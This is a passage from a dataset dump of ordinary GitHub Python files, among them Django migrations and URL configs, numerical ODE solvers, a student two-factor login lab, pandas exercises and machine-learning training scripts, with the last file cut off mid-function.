blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
fbf8c0eedc51f3af0036528997de11c2f317912a | aac6a135e4ca83ffa5f9d6bf2f34ec4810aab114 | /account/migrations/0016_auto_20210528_1505.py | 4f2440357ba740cb9f3e06792638a0fe9bad0648 | [] | no_license | Achraf-Razzouqi/App-E-bank | fe76d9cf5f11a1afb740341ec604871526b5b489 | 64e5c531ba7b728fa239beca0ad2b7763f3d5a54 | refs/heads/main | 2023-05-13T09:54:58.804394 | 2021-06-05T00:45:03 | 2021-06-05T00:45:03 | 373,988,568 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,034 | py | # Generated by Django 3.2.2 on 2021-05-28 14:05
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated Django migration: creates the Conseille table and adds
    # a ForeignKey 'idC' from the 'use' model to it.
    dependencies = [
        ('account', '0015_auto_20210528_1449'),
    ]
    operations = [
        migrations.CreateModel(
            name='Conseille',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                # All text columns are nullable; cne and phone must be unique.
                ('nom', models.CharField(max_length=50, null=True)),
                ('prenom', models.CharField(max_length=50, null=True)),
                ('cne', models.CharField(max_length=50, null=True, unique=True)),
                ('phone', models.CharField(max_length=50, null=True, unique=True)),
            ],
        ),
        migrations.AddField(
            model_name='use',
            name='idC',
            field=models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, related_name='idC', to='account.conseille'),
        ),
    ]
| [
"46264662+Achraf-Razzouqi@users.noreply.github.com"
] | 46264662+Achraf-Razzouqi@users.noreply.github.com |
ef78bf7f443635496ae6e3e1f78a094d28cd23ea | 6ffc82647c630839f2bbdc0321dcaffc9eda1f34 | /stock_transation_program.py | 979ba5d11acf25dced8dcbd8728563cd39e8a0fb | [] | no_license | satheeshkumars/my_chapter_2_solution_gaddis_book_python | 584cab0c6ba9c8c4ff7a5a2947cdba53f1b943e6 | 64d919fd1f70bcff91cc5cd47420870a68e59106 | refs/heads/master | 2022-02-26T20:43:23.183785 | 2019-10-10T20:59:40 | 2019-10-10T20:59:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 727 | py | SHARES_BOUGHT = 2000
COST_BOUGHT = 40            # purchase price per share
COMMISSION = 0.03           # broker commission rate (3%)
# Commission paid when buying: 3% of the total purchase amount.
commission_on_buy = COMMISSION * (COST_BOUGHT * SHARES_BOUGHT)
SHARES_SOLD = 2000          # all purchased shares are sold
COST_SOLD = 42.75           # sale price per share
# Commission paid when selling: 3% of the total sale amount.
commission_on_sale = COMMISSION * (SHARES_SOLD * COST_SOLD)
paid = COST_BOUGHT * SHARES_BOUGHT
print('The amount Joe paid for the stock is $', paid)
print('The amount of commission Joe paid his broker when he bought the stock is $', commission_on_buy)
sold = SHARES_SOLD * COST_SOLD
print('The amount Joe sold the stock is $', sold)
print('The amount of commission Joe paid his broker when he sold the stock is $', commission_on_sale)
# Net result after subtracting both commissions from the sale proceeds.
amount_left = (sold - commission_on_sale) - (paid + commission_on_buy)
print('Joe has $', amount_left, ' left.', sep = '')
"noreply@github.com"
] | satheeshkumars.noreply@github.com |
151c1e40e57679713ceedce80cba0891924d7705 | 7eec7ff6a6eebb7cd912159b94c583850b37a015 | /C3PO/Models/Embedding.py | 7a4ea1f9af740970ec8edfb1acac45b94728ad11 | [
"MIT"
] | permissive | tech-srl/c3po | 6dcf0ccc47643c04cc7488699d10b8209c8e17d3 | ce1e002bf9d026c10fbd2c178d454ebb76cb7a94 | refs/heads/master | 2023-05-01T06:23:15.860922 | 2021-05-21T07:18:23 | 2021-05-21T07:18:23 | 296,620,657 | 25 | 7 | null | null | null | null | UTF-8 | Python | false | false | 300 | py | import torch.nn as nn
class Embedding(nn.Module):
    """Token-embedding layer that tolerates non-integer index tensors.

    Indices are cast to ``long`` before the table lookup, so callers may
    pass tensors of any numeric dtype.  Row ``padding_idx`` is reserved
    for padding tokens.
    """

    def __init__(self, vocab_size, h_dim, padding_idx=0):
        super().__init__()
        # Keep the attribute name ``emb`` so state-dict keys stay stable.
        self.emb = nn.Embedding(vocab_size, h_dim, padding_idx=padding_idx)

    def forward(self, inputs):
        # Cast first, then look up the embedding rows.
        indices = inputs.long()
        return self.emb(indices)
| [
"shaked@gmail.com"
] | shaked@gmail.com |
249ddc324320ba1c1f378517052d7ce9b068573b | f663790145e8e286b117ef639b626b492ae9f57a | /device/solver.py | 1b0a1a1d693fcb1b7912d291075ced729c548945 | [
"MIT"
] | permissive | longyangking/Device | 354d1261c094e367e59b67253781ac4cc496f91b | b8cf9fce5a8921dea179b0bb5a58a1a70dfb8f08 | refs/heads/master | 2021-01-17T00:38:53.101151 | 2018-06-02T11:55:53 | 2018-06-02T11:55:53 | 63,251,260 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,278 | py | import numpy as np
from scipy.integrate import ode
from scipy.integrate import odeint
class SymplecticSolver:
    '''
    Second-order symplectic (velocity-Verlet style) integrator, e.g. for
    molecular dynamics.

    A(state, t): kinetic term, drives the momentum update.
    B(state, t): potential term, drives the coordinate update.
    state is passed to both callbacks as the list [p, q].
    '''
    def __init__(self, nvars, A, B, init_state, order=2):
        '''
        nvars: number of degrees of freedom (kept for interface parity).
        init_state: tuple (p, q) of initial momentum and coordinate.
        order: integration order; only order 2 is implemented.
        '''
        self.init_state = init_state
        self.A = A
        self.B = B
        self.t = None
        # BUG FIX: the original hard-coded ``self.order = 2`` and silently
        # ignored the ``order`` argument; honor it (default unchanged).
        self.order = order

    def init(self, init_state=None):
        # Reset solver state; fall back to the state given at construction.
        if init_state is None:
            p, q = self.init_state
        else:
            p, q = init_state
        self.p, self.q = p, q
        self._p, self._q = p, q  # previous-step bookkeeping
        self.t = None
        return True

    def update(self, dt):
        if self.order == 2:
            prev_p, prev_q = self.p, self.q
            # BUG FIX: the original referenced undefined names ``p``/``q``
            # (NameError on first call).  Use the current state at each
            # sub-step: half kick, full drift, half kick (velocity Verlet).
            self.p = self.p + 0.5 * self.A([self.p, self.q], self.t) * dt
            self.q = self.q + self.B([self.p, self.q], self.t) * dt
            self.p = self.p + 0.5 * self.A([self.p, self.q], self.t) * dt
            self._p, self._q = prev_p, prev_q
        if self.order == 3:
            # TODO order 3
            pass

    def evaluate(self, timesteps):
        # Integrate over the time grid, returning [p, q] at every step
        # (the first entry is the current state before any update).
        n_values = len(timesteps)
        values = list()
        values.append([self.p, self.q])
        self.t = timesteps[0]
        for i in range(1, n_values):
            dt = timesteps[i] - timesteps[i-1]
            self.update(dt)
            # BUG FIX: advance the clock so time-dependent A/B see the
            # correct t (the original left self.t frozen at timesteps[0]).
            self.t = timesteps[i]
            value = [self.p, self.q]
            values.append(value)
        return values
class ODE:
    '''
    Simulation for real/complex-valued ODE
    dy/dt = f(y,t0)

    Thin wrapper around ``scipy.integrate.ode`` using the VODE family of
    integrators ('vode' for real-valued systems, 'zvode' for complex ones).
    '''
    def __init__(self,fun,y0,t0=0,jac=None,iscomplex=True,method='bdf'):
        # fun(t, y): right-hand side; jac: optional Jacobian callback.
        self.fun = fun
        self.jac = jac
        self.y0 = y0
        self.t0 = t0
        self.method = method          # 'bdf' (stiff) or 'adams' (non-stiff)
        self.iscomplex = iscomplex    # selects 'zvode' vs 'vode'
        self.system = None            # created lazily in init()
    def set_method(self,method,iscomplex=True):
        # Returns False (and changes nothing) for an unsupported method name.
        methods = ['bdf','adams']
        if method not in methods:
            return False
        self.iscomplex = iscomplex
        self.method = method
        return True
    def set_fun(self,fun):
        self.fun = fun
    def set_jacobian(self,jac):
        self.jac = jac
    def set_initial_value(self,y0,t0):
        self.y0 = y0
        self.t0 = t0
    def init(self):
        # (Re)build the underlying scipy integrator from the current settings.
        self.system = ode(self.fun,self.jac)
        # set integrator
        code = 'vode'
        if self.iscomplex:
            code = 'zvode'
        self.system.set_integrator(code, method=self.method)
        self.system.set_initial_value(self.y0,self.t0)
        return self.system.successful()
    def evaluate(self,timesteps,step=False,relax=False):
        # Integrate to each requested time; returns (status, values).
        # NOTE(review): init() is re-run on every iteration, so each
        # integrate() restarts from (y0, t0) instead of continuing from the
        # previous time -- results are correct but cost grows O(n^2) with
        # the number of timesteps.
        n_values = len(timesteps)
        values = list()
        status = True
        for i in range(n_values):
            t = timesteps[i]
            status = status and self.init()
            value = self.system.integrate(t,step,relax)
            values.append(value)
        return status, values
    def get_time(self):
        # Current internal time of the underlying scipy integrator.
        return self.system.t
class FastODE:
    """Thin wrapper around ``scipy.integrate.odeint`` for real-valued ODEs.

    Mirrors the interface of the other solver classes (``init`` /
    ``evaluate``) so callers can swap implementations uniformly.
    """

    def __init__(self, fun, y0):
        self.fun = fun        # right-hand side f(y, t)
        self.y0 = y0          # initial condition
        self.system = None    # unused; kept for interface parity

    def set_fun(self, fun):
        """Replace the right-hand-side function."""
        self.fun = fun

    def set_initial_value(self, y0):
        """Replace the initial condition."""
        self.y0 = y0

    def init(self):
        # No setup is required; exists so callers can treat every solver alike.
        return True

    def evaluate(self, ts):
        """Integrate over the time grid ``ts`` and return the solution array."""
        return odeint(func=self.fun, y0=self.y0, t=ts)
if __name__=='__main__':
    # Smoke tests for the solver classes; run only when executed directly.
    # Test simulation class
    print('Inner test: ODE')
    y0, t0 = [1.0j, 2.0], 0
    # ODE wraps scipy.integrate.ode, whose callback signature is fun(t, y).
    def fun(t,y):
        return [1j*2*y[0] + y[1], -2*y[1]**2]
    sim = ODE(fun=fun,y0=y0,t0=t0)
    print('ODE status: ',sim.init())
    # Test fastsimulation class
    print('Inner test: Fast ODE')
    # FastODE wraps scipy.integrate.odeint, whose callback is fun(y, t)
    # (argument order is swapped relative to the ODE class above).
    def fun(y, t):
        theta, omega = y
        dydt = [omega, -0.25*omega - 5.0*np.sin(theta)]
        return dydt
    y0 = [np.pi-0.1,0.0]
    ts = np.linspace(0,10,101)
    sim = FastODE(fun=fun,y0=y0)
    print('Fast ODE status: ',sim.init())
    sol = sim.evaluate(ts)
    # Plot the damped-pendulum trajectory; the import is kept local so the
    # solver module itself does not require matplotlib.
    import matplotlib.pyplot as plt
    plt.plot(ts, sol[:, 0], 'b', label='theta(t)')
    plt.plot(ts, sol[:, 1], 'g', label='omega(t)')
    plt.legend(loc='best')
    plt.xlabel('t')
    plt.show()
"longyang_123@yeah.net"
] | longyang_123@yeah.net |
10f288b55b2a6fd86e11600f7f41db43dff2e0c0 | 12cbd2ea83a67f4edce2d31cd337455a6d53d86e | /coding_challenge/apps.py | 713c6aac62ecb740465fdc322287013601d45baa | [] | no_license | shols232/coding | c3b6e1d3610a16ea32ea5ab1a35ed943a05268f5 | 260f44fa2c4caa8f97af33fed231f413a9f71bd0 | refs/heads/master | 2023-08-17T15:43:41.754370 | 2020-06-23T10:53:20 | 2020-06-23T10:53:20 | 274,131,496 | 1 | 3 | null | 2021-09-22T19:17:54 | 2020-06-22T12:31:37 | Python | UTF-8 | Python | false | false | 106 | py | from django.apps import AppConfig
class CodingChallengeConfig(AppConfig):
    # Django app configuration; 'name' is the app's Python module path.
    name = 'coding_challenge'
| [
"akinsolaademolatemitope@gmail.com"
] | akinsolaademolatemitope@gmail.com |
bc6c82fb55445d9be7ff31521c860701bb0ad7c2 | 064795929a2c14642198a496198427262b680455 | /page5.py | c143334c0887539952d0d9f36f7486bca81779b1 | [] | no_license | rajurana20/pythonAtRevature | 98882415c82acfc98149e3835df41cf1730d98eb | afb1bbbbc4503b9ab9dbb409418242b9f6bbdd73 | refs/heads/master | 2023-03-20T21:28:46.194100 | 2021-03-18T12:24:16 | 2021-03-18T12:24:16 | 348,841,394 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,020 | py | #classes
# Multiple classes can be placed in a single file. Classes are placed in multiple files if code becomes very big and need to put the critical parts of the code into multiple files, to make it easily accessible by other team programmers.
# Can multiple object be created from the same class?
# Yes, multiple objects can be created
# Can objects create classes?
# A Class is like an object constructor, or a "blueprint" for creating objects.
class Person:
    """Simple person record with a console greeting."""

    def __init__(self, name, age):
        # Expose both constructor arguments as public attributes.
        self.name = name
        self.age = age

    def myGreeting(self):
        # Build the greeting first, then emit it on stdout.
        greeting = "Hello my name is " + self.name
        print(greeting)
# use setter and getter to implement data hiding
p1 = Person("Jake", 36)
p1.myGreeting()
# Module ------------------------------------------
import math
# Demo: evaluate sin(pi/6) with the standard-library math module.
a = math.pi / 6
# returning the value of sine of pi / 6
print ("The value of sine of pi / 6 is : ", end ="")
print (math.sin(a))
# multiple inheritance
# Diamond hierarchy: Class4 inherits from both Class2 and Class3, which
# both inherit from Class1; every class overrides m().
class Class1:
    def m(self):
        print("Called function in Class1")
class Class2(Class1):
    def m(self):
        print("Called function in Class2")
class Class3(Class1):
    def m(self):
        print("Called function in Class3")
class Class4(Class2, Class3):
    def m(self):
        print("Called function in Class4")
obj = Class4()
# obj.m() resolves to Class4's override; the unbound calls below invoke
# each ancestor's version explicitly on the same instance.
obj.m()
Class2.m(obj)
Class3.m(obj)
Class1.m(obj)
# A static method
# called without an object but cannot be utilized in collections
class C:
    # f is a static method: callable on the class without an instance and
    # without any implicit self/cls argument.
    @staticmethod
    def f(arg1, arg2):
        print("The values are", arg1, arg2)
C.f(3,4)
# iterable data type can be lists, tuples, dictionaries and sets
# Manual iteration: iter() builds an iterator, next() pulls one element.
mytuple = ("toyota", "nissan", "honda")
myit = iter(mytuple)
print(next(myit))
print(next(myit))
print(next(myit))
# With class method
class MyClass:
    # classmethod receives the class object as its first argument.
    @classmethod
    def classmethod(cls):
        return 'class method called', cls
    # staticmethod receives no implicit argument at all.
    @staticmethod
    def staticmethod():
        return 'static method called'
print(MyClass.classmethod())
print(MyClass.staticmethod())
| [
"ranaraju315@gmail.com"
] | ranaraju315@gmail.com |
b11bcf301a395e9e6b46a09ceae1bcccb5a064bf | 4e8664bcd1e11be648a7f81d1563009273c8e695 | /newsapp/newsapp/urls.py | c94badca8f557aee713272e59fed3a6c566eac74 | [] | no_license | NikhilB123/NetworkSecurityLab1 | b7021a43a6b901938a54c5a0e0e3a9a0e734e5f9 | 8d8bc1cea3056a87168dd5d19fbe5add39289f0f | refs/heads/master | 2022-12-21T20:39:38.733227 | 2020-09-27T20:13:54 | 2020-09-27T20:13:54 | 298,892,022 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,289 | py | """newsapp URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from django.contrib.auth import views as auth_views
from django.contrib.auth.forms import AuthenticationForm, UserCreationForm
from django import forms
from newslister.models import UserXtraAuth
from newslister.views import register_view, account
import fake_token
class TokenLoginForm(AuthenticationForm):
    """Login form adding a second factor: users whose secrecy level is
    positive must append their current token code to their password."""
    def clean(self):
        # STUDENT TODO:
        # This is where password processing takes place.
        # For 2-factor authentication, you need to
        # check that the token number is appended to
        # the end of the password entered by the user
        # You don't need to check the password; Django is
        # doing that.
        # testing1232
        # NOTE(review): the print() calls below write passwords and token
        # keys to stdout -- remove before production.
        print("start")
        user_password = self.cleaned_data['password']
        if not UserXtraAuth.objects.filter(username=self.cleaned_data['username']).exists():
            # User not found. Set secrecy to 0
            user_secrecy = 0
        else:
            user_xtra_auth = UserXtraAuth.objects.get(username=self.cleaned_data['username'])
            user_secrecy = user_xtra_auth.secrecy
        if user_secrecy > 0:
            print(user_xtra_auth.tokenkey)
            token_key = user_xtra_auth.tokenkey.encode()
            # next(key) yields an indexable value whose second element is
            # treated as the current token code.
            key = fake_token.FakeToken(token_key)
            currentKey = next(key)[1]
            cur_key_len = len(str(currentKey))
            print(user_password)
            print(type(user_password[len(user_password) - cur_key_len:]))
            # Accept only if the password's trailing digits equal the current
            # token code; strip them so Django validates the bare password.
            # NOTE(review): if the entered password is shorter than the token
            # code, the slice start goes negative and the check is applied to
            # the whole password -- TODO confirm/guard.
            if user_password[len(user_password) - cur_key_len:].isnumeric() and int(user_password[len(user_password) - cur_key_len:]) == currentKey:
                self.cleaned_data['password'] = user_password[0: len(user_password) - cur_key_len]
            else:
                raise forms.ValidationError("Invalid Token Code")
        # the password in the form in self._cleaned_data['password']
        print(self.cleaned_data['password'])
        return super().clean()
# URL routes for the project.  Login uses the custom TokenLoginForm defined
# above so the two-factor token check runs during authentication.
urlpatterns = [
    path('login/', auth_views.LoginView.as_view(
        template_name="registration/login.html",
        authentication_form=TokenLoginForm),
        name='login'
    ),
    path('logout/', auth_views.LogoutView.as_view(
        template_name="registration/logout.html"),
        name='logout'
    ),
    # Account registration handled by the app's register_view.
    path('register/', register_view,
        name="register"),
    path('admin/', admin.site.urls),
    # This line will look for urls in app
    path('',include('newslister.urls')),
    path('newslist/',include('newslister.urls')),
    path('account/',account, name="account")
]
| [
"nbodicha@gmail.com"
] | nbodicha@gmail.com |
c0c25b1d782fa904c2f82b0f8281c1d64826f289 | 47f3b32c01cd88cdbaa52b43ed8fe855a454d2d6 | /pandas_lib3.py | 8dea07c5497a2a740e598a0a75f02ac16d037c4c | [] | no_license | Mukesh80530/python_for_datascience | 34e68333a10d412659839331195ec897a7931c09 | f9366f0d23459b3fefb9f5b37d87b8824b10b850 | refs/heads/master | 2023-02-13T09:09:46.379871 | 2021-01-17T14:39:11 | 2021-01-17T14:39:11 | 330,195,065 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 711 | py | import pandas as pd
import numpy as np
# Load the Toyota used-car dataset; the first CSV column becomes the index
# and the placeholder strings "??"/"????" are parsed as NaN.
cars_data = pd.read_csv('Toyota.csv', index_col=0, na_values=["??","????"])
# print(cars_data.info())
# cars_data['MetColor'] = cars_data['MetColor'].astype('object')
# cars_data['Automatic'] = cars_data['Automatic'].astype('object')
# print(cars_data.info())
# print(cars_data['FuelType'].nbytes)
# print(cars_data['FuelType'].astype('category').nbytes)
# print(np.unique(cars_data['Doors']))
# print(np.where(cars_data['Doors']))
# cars_data['Doors'].replace('three', 3, inplace=True)
# cars_data['Doors'].replace('four', 4, inplace=True)
# cars_data['Doors'].replace('five', 5, inplace=True)
# print(np.unique(cars_data['Doors']))
# Report the count of missing values per column.
print(cars_data.isnull().sum())
"mukeshgautam.er@gmail.com"
] | mukeshgautam.er@gmail.com |
f6cd3cd1c08de907d6dc8e70971624f5b8e0b4ef | 4b9bcf0576256238e91bc1fb99d12fca6fa84920 | /core/user/admin.py | 385e1a4f791a45027d8d255b90b7331139fa9787 | [] | no_license | kevinitsDevaluado/CursosOracle | 734c2dac77a96d2e1055efa357af6d072ceec511 | e227b211eaa36515b60361f97c616159abf9e65a | refs/heads/main | 2023-03-07T22:27:01.830666 | 2021-02-20T18:11:18 | 2021-02-20T18:11:18 | 340,718,244 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 122 | py | from django.contrib import admin
# Register your models here.
from core.user.models import User
admin.site.register(User) | [
"kevin.alvarado8502@utc.edu.ec"
] | kevin.alvarado8502@utc.edu.ec |
98a2fbc4649d975e2d377fd1807563c36b2fd8ac | 01f8fc5229a538ed5b6787d469e25738c7f19d05 | /archive_model/HyperParameterTuning.py | a21a6db83648c946b0a9500afc63421c0837a0f0 | [] | no_license | nwihardjo/RL-Trading-Agent | 8f83360557a3427941ac4133d1d294eb3f7d492d | 3904505fb2d5d58f0466892e6f698d1ab6ea2bb5 | refs/heads/master | 2021-10-10T20:56:06.830894 | 2019-01-17T06:55:22 | 2019-01-17T06:55:22 | 161,769,473 | 25 | 12 | null | null | null | null | UTF-8 | Python | false | false | 7,375 | py | # -*- coding:utf-8 -*-
import os
import requests
import itertools
from utils.EnvironmentUtils import build_backtest_environment
from utils.DataUtils import *
import tensorflow as tf
from model_archive.DRL_Portfolio_Isolated_Simple import DRL_Portfolio
from env.zipline_env import AgentTrader
import pickle
start_date_str = '2005-02-08'
end_date_str = '2018-03-27'
bootstrap_length = 300
data, env, bundle, sim_params = build_backtest_environment(start_date_str, end_date_str)
# =========================================
# load security pool
if not os.path.exists('sp500.csv'):
print('downloading sp500 data')
with open('sp500.csv', 'wb+') as f:
response = requests.get('https://datahub.io/core/s-and-p-500-companies-financials/r/constituents-financials.csv')
f.write(response.content)
sp500 = pd.read_csv('sp500.csv')
sp500.index = sp500['Symbol']
high_cap_company = sp500.loc[list(itertools.chain.from_iterable(list(map(lambda x: x[1][:5], list(sp500.sort_values('Market Cap').groupby('Sector').groups.items())))))]
assets = list(high_cap_company.Symbol.values)
assets = retrieve_equitys(bundle, assets)
# =========================================
# prepare data
initial_history_start_date = bundle.equity_daily_bar_reader.sessions[bundle.equity_daily_bar_reader.sessions < start_date_str][(-bootstrap_length - 1)]
initial_history_end_date = bundle.equity_daily_bar_reader.sessions[bundle.equity_daily_bar_reader.sessions > start_date_str][0]
filtered_assets_index = (np.isnan(np.sum(bundle.equity_daily_bar_reader.load_raw_arrays(columns=['close'], start_date=initial_history_start_date, end_date=initial_history_end_date, assets=assets), axis=1)).flatten() == False)
assets = list(np.array(assets)[filtered_assets_index])
print(assets, len(assets))
remain_asset_names = list(map(lambda x: x.symbol, assets))
equity_data = prepare_equity_data(initial_history_start_date, remain_asset_names)
index_data = prepare_index_data(initial_history_start_date, equity_data.major_axis)
news_data = prepare_news_data(equity_data)
# The dictionary may change the order of assets, so we rebuild the assets list
assets = retrieve_equitys(bundle, list(equity_data.items))
remain_asset_names = list(map(lambda x: x.symbol, assets))
assert equity_data.major_axis[0] == index_data.major_axis[0]
# ==============================================================================
# Start the backtest
# Step 1. define the hyper-parameter combination
training_sequence_length = [30, 60, 100, 150, None]
taos = [1.0, 5.0]
attention_length = [5, 10]
network_plan = [
([128], [64]),
([256, 128], [64, 32]),
([512, 256, 128], [128, 64])
]
object_function = ['reward', 'sortino']
equity_network_template = {
'feature_map_number': len(assets),
'feature_number': equity_data.shape[2],
'input_name': 'equity',
'keep_output': True
}
index_network_template = {
'feature_map_number': len(index_data.items),
'feature_number': index_data.shape[2],
'input_name': 'index',
'keep_output': False
}
news_network_template = {
'feature_map_number': 1,
'feature_number': 100,
'input_name': 'news',
'keep_output': False
}
weight_network_template = {
'feature_map_number': 1,
'feature_number': len(assets) + 1,
'input_name': 'weight',
'keep_output': False
}
return_network_template = {
'feature_map_number': 1,
'feature_number': 1,
'input_name': 'return',
'keep_output': False
}
networks = {
'equity_network': equity_network_template,
'weight_network': weight_network_template,
'return_network': return_network_template,
'index_network': index_network_template,
'news_network': news_network_template
}
other_features = {
'index_network': {
'data': index_data,
'normalize': True
},
'news_network': {
'data': news_data,
'normalize': False
}
}
hyper_parameters = []
for d, r in network_plan:
for act in [tf.nn.relu, tf.nn.tanh]:
for attn in attention_length:
for tao in taos:
for sequence_length in training_sequence_length:
for o in object_function:
network_topology = {}
training_strategy = {
'training_data_length': sequence_length,
'tao': tao,
'short_term': {
'interval': 1,
'max_epoch': 1,
'keep_prob': 1.0
},
'long_term': {
'interval': 30,
'max_epoch': 10,
'keep_prob': 0.85,
}
}
for k, v in networks.items():
template = v
if k == 'equity_network':
template['dense'] = {
'n_units': d,
'act': [act] * len(d)
}
template['rnn'] = {
'n_units': r + [1],
'act': [act] * len(r) + [tf.nn.sigmoid],
'attention_length': attn
}
else:
template['dense'] = {
'n_units': d,
'act': [act] * len(d)
}
template['rnn'] = {
'n_units': r,
'act': [act] * len(r),
'attention_length': attn
}
network_topology[k] = template
hyper_parameters.append((network_topology, training_strategy, o))
if not os.path.exists('./experiment'):
os.mkdir('./experiment')
# Run every hyper-parameter combination as an independent experiment,
# persisting the configuration, trained model, actions and results so a
# failed run can be inspected later without stopping the whole sweep.
for i, h in enumerate(hyper_parameters):
    result_dir = './experiment/result%d' % i
    model_dir = result_dir + '/model_archive'
    if not os.path.exists(result_dir):
        os.mkdir(result_dir)
    if not os.path.exists(model_dir):
        os.mkdir(model_dir)
    topology = h[0]      # feature-network topology dict
    strategy = h[1]      # training-strategy dict
    o_function = h[2]    # objective function name ('reward' / 'sortino')
    model = DRL_Portfolio(asset_number=len(assets), feature_network_topology=topology, object_function=o_function, learning_rate=0.001)
    trader = AgentTrader(
        model=model,
        pre_defined_assets=assets,
        equity_data=equity_data,
        other_data=other_features,
        training_strategy=strategy,
        sim_params=sim_params,
        pre_trained_model_path=None,
        name='backtest_%d' % (i),
        env=env
    )
    try:
        # Save the configuration first so even a failed run is reproducible.
        with open(result_dir + '/hyper_parameter', 'wb+') as f:
            pickle.dump({'topology': topology, 'strategy': strategy, 'object': o_function}, file=f)
        trained_model, actions, result = trader.backtest(data)
        trained_model.save_model(model_dir)
        np.save(result_dir + '/action', actions)
        result.to_pickle(result_dir + '/result')
    except Exception as e:
        # BUG FIX: Python 3 exceptions have no ``.message`` attribute, so the
        # original ``print(e.message)`` raised AttributeError here and killed
        # the sweep; print the exception itself and move to the next combo.
        print(e)
        continue
| [
"wihardjo.nathaniel@gmail.com"
] | wihardjo.nathaniel@gmail.com |
a44780758c3ce69a3fe69ad94c7f73afc8dd16bd | c51ba90d26e8ee2bb91a98852bc7ee23fa7f4028 | /pytorch_code/main.py | f837062fa5ceb12c59c72218a17f162cffefcd77 | [] | no_license | liuzongzhou/GC-SAN | 3106f05d12e1421c3d4218f29c57624d480754a3 | 6231d3e1a7d4d169d599df71b74c9be91e4e1741 | refs/heads/master | 2023-06-10T02:59:13.666139 | 2021-07-01T09:17:25 | 2021-07-01T09:17:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,605 | py | #!/usr/bin/env python36
# -*- coding: utf-8 -*-
"""
Created on July, 2018
@author: Tangrizzly
"""
import argparse
import pickle
import time
from utils import build_graph, Data, split_validation
from model import *
parser = argparse.ArgumentParser()
parser.add_argument('--dataset', default='diginetica', help='dataset name: diginetica/yoochoose1_4/yoochoose1_64/sample')
parser.add_argument('--batchSize', type=int, default=50, help='input batch size')
parser.add_argument('--hiddenSize', type=int, default=120, help='hidden state size')
parser.add_argument('--epoch', type=int, default=30, help='the number of epochs to train for')
parser.add_argument('--lr', type=float, default=0.001, help='learning rate') # [0.001, 0.0005, 0.0001]
parser.add_argument('--lr_dc', type=float, default=0.1, help='learning rate decay rate')
parser.add_argument('--lr_dc_step', type=int, default=3, help='the number of steps after which the learning rate decay')
parser.add_argument('--l2', type=float, default=1e-5, help='l2 penalty') # [0.001, 0.0005, 0.0001, 0.00005, 0.00001]
parser.add_argument('--step', type=int, default=1, help='gnn propogation steps')
parser.add_argument('--patience', type=int, default=10, help='the number of epoch to wait before early stop ')
parser.add_argument('--nonhybrid', action='store_true', help='only use the global preference to predict')
parser.add_argument('--validation', action='store_true', help='validation')
parser.add_argument('--valid_portion', type=float, default=0.1, help='split the portion of training set as validation set')
parser.add_argument('--dynamic', type=bool, default=False)
opt = parser.parse_args()
print(opt)
def main():
    """Load the dataset, train the session-graph model, and report the best
    Recall@20 / MRR@20 observed, stopping early after ``opt.patience``
    consecutive epochs without improvement."""
    train_data = pickle.load(open('../datasets/' + opt.dataset + '/train.txt', 'rb'))
    if opt.validation:
        # Carve a validation split out of the training set and test on it.
        train_data, valid_data = split_validation(train_data, opt.valid_portion)
        test_data = valid_data
    else:
        test_data = pickle.load(open('../datasets/' + opt.dataset + '/test.txt', 'rb'))
    # all_train_seq = pickle.load(open('../datasets/' + opt.dataset + '/all_train_seq.txt', 'rb'))
    # g = build_graph(all_train_seq)
    train_data = Data(train_data, shuffle=True, opt=opt)
    test_data = Data(test_data, shuffle=False, opt=opt)
    # del all_train_seq, g
    # Per-dataset item count, passed to SessionGraph as n_node.
    if opt.dataset == 'diginetica':
        n_node = 43098
    elif opt.dataset == 'yoochoose1_64' or opt.dataset == 'yoochoose1_4':
        n_node = 37484
    elif opt.dataset == 'diginetica_users':
        n_node = 57070
    else:
        n_node = 310
    model = trans_to_cuda(SessionGraph(opt, n_node, max(train_data.len_max, test_data.len_max)))
    start = time.time()
    best_result = [0, 0]   # best [Recall@20, MRR@20] seen so far
    best_epoch = [0, 0]    # epoch at which each best value occurred
    bad_counter = 0        # consecutive epochs with no improvement
    for epoch in range(opt.epoch):
        print('-------------------------------------------------------')
        print('epoch: ', epoch)
        hit, mrr = train_test(model, train_data, test_data)
        flag = 0
        if hit >= best_result[0]:
            best_result[0] = hit
            best_epoch[0] = epoch
            flag = 1
        if mrr >= best_result[1]:
            best_result[1] = mrr
            best_epoch[1] = epoch
            flag = 1
        print('Best Result:')
